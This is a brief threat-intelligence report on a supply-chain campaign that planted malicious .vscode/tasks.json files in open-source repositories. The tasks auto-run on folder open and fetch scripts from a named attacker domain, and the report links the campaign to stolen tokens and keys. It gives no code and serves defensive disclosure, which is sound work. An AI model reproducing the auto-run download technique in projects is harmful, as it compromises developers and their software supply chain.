OpenSourceMalware reported an ongoing campaign in which at least 21 small open-source maintainers had repositories modified with malicious .vscode/tasks.json files over 72 hours. The actor is listed as unknown, but the task files are described as closely resembling DPRK Contagious Interview tradecraft previously seen in Lazarus activity. The malicious tasks run automatically on folder open and download platform-specific Linux, macOS, or Windows scripts from vscode-extension-260120.vercel.app. Current payloads were described as innocuous placeholders, but victim feedback pointed to compromised GitHub personal access tokens or stolen SSH keys, making the access dangerous for future supply-chain payloads such as Beavertail.